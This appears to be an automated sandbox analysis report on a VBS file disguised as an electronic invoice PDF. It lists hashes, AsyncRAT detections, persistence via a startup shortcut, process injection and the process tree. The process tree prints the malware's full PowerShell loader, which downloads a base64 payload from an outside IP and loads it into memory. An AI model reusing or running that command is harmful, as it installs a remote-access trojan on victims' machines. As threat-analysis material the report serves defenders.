Analysis
-
max time kernel
61s -
max time network
267s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
08-10-2022 08:19
Static task
static1
Behavioral task
behavioral1
Sample
Fact_Elect_En_Mora_No. 01_0710-PASS_6010_CUFE-7IZG026010_PDF.vbs
Resource
win7-20220812-en
General
-
Target
Fact_Elect_En_Mora_No. 01_0710-PASS_6010_CUFE-7IZG026010_PDF.vbs
-
Size
442KB
-
MD5
62174dd3cc316dff4896b292cde3eebc
-
SHA1
abc441c9636e64ff3c6a24879efc6c847640adfa
-
SHA256
1add10f411596ce592775736cbd547b0de4e69ae044173cb604bc1cb410dc424
-
SHA512
ec4d0dd87b74e8ae268d9cea674a75920b0935095c975db0f3609af176ee3392801ec9d12ad0705964fd4491bc5b05ac6f089b7b34690a64923b5fb5c098e7f3
-
SSDEEP
768:De0E0B0S0Y0V0w0B0V0/i0j0+050kfF0NF0B0Z/0pP40E0X070M0Ao0O0gAOAqAn:7aW1AP4HgK
Malware Config
Extracted
http://20.7.14.99/dll/dll_ink.pdf
Signatures
-
Async RAT payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/1340-137-0x0000000000400000-0x000000000041A000-memory.dmp asyncrat behavioral2/memory/1340-138-0x000000000041474E-mapping.dmp asyncrat -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 4044 powershell.exe 7 4044 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 4044 set thread context of 1340 4044 powershell.exe cvtres.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 4044 powershell.exe 4044 powershell.exe 312 powershell.exe 312 powershell.exe 4044 powershell.exe 4044 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.execvtres.exedescription pid process Token: SeDebugPrivilege 4044 powershell.exe Token: SeDebugPrivilege 312 powershell.exe Token: SeDebugPrivilege 1340 cvtres.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 3880 wrote to memory of 4044 3880 WScript.exe powershell.exe PID 3880 wrote to memory of 4044 3880 WScript.exe powershell.exe PID 4044 wrote to memory of 312 4044 powershell.exe powershell.exe PID 4044 wrote to memory of 312 4044 powershell.exe powershell.exe PID 4044 wrote to memory of 2664 4044 powershell.exe cvtres.exe PID 4044 wrote to memory of 2664 4044 powershell.exe cvtres.exe PID 4044 wrote to memory of 2664 4044 powershell.exe cvtres.exe PID 4044 wrote to memory of 1340 4044 powershell.exe cvtres.exe PID 4044 wrote to memory of 1340 4044 powershell.exe cvtres.exe PID 4044 wrote to memory of 1340 4044 powershell.exe cvtres.exe PID 4044 wrote to memory of 1340 4044 powershell.exe cvtres.exe PID 4044 wrote to memory of 1340 4044 powershell.exe cvtres.exe PID 4044 wrote to memory of 1340 4044 powershell.exe cvtres.exe PID 4044 wrote to memory of 1340 4044 powershell.exe cvtres.exe PID 4044 wrote to memory of 1340 4044 powershell.exe cvtres.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fact_Elect_En_Mora_No. 01_0710-PASS_6010_CUFE-7IZG026010_PDF.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('0/9EUiS/d/ee.etsap//:sptth'))2⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Debug.vbs3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD56b49e8f169d2f316e251bb33b6966426
SHA172269ec042c9953fbe2465cd343034b7a7b810a8
SHA2560f5bbb69b875c76e5430b8d3175df55d2cb25cb42b423de593c4d03740d4c506
SHA512b1e3189a8908e2891623302b466f44a55d7afbf1e786b619098242fde5b5c29322f44026a540e9b0b67885c72b0903be7470f5df5608be2e16388ec10e27b952
-
memory/312-145-0x00007FFE4E8F0000-0x00007FFE4F3B1000-memory.dmpFilesize
10.8MB
-
memory/312-135-0x0000000000000000-mapping.dmp
-
memory/312-136-0x00007FFE4E8F0000-0x00007FFE4F3B1000-memory.dmpFilesize
10.8MB
-
memory/1340-138-0x000000000041474E-mapping.dmp
-
memory/1340-137-0x0000000000400000-0x000000000041A000-memory.dmpFilesize
104KB
-
memory/1340-142-0x0000000005AF0000-0x0000000005B8C000-memory.dmpFilesize
624KB
-
memory/1340-143-0x0000000006140000-0x00000000066E4000-memory.dmpFilesize
5.6MB
-
memory/1340-144-0x0000000005C00000-0x0000000005C66000-memory.dmpFilesize
408KB
-
memory/4044-132-0x0000000000000000-mapping.dmp
-
memory/4044-134-0x00007FFE4E8F0000-0x00007FFE4F3B1000-memory.dmpFilesize
10.8MB
-
memory/4044-141-0x00007FFE4E8F0000-0x00007FFE4F3B1000-memory.dmpFilesize
10.8MB
-
memory/4044-133-0x00000176D6580000-0x00000176D65A2000-memory.dmpFilesize
136KB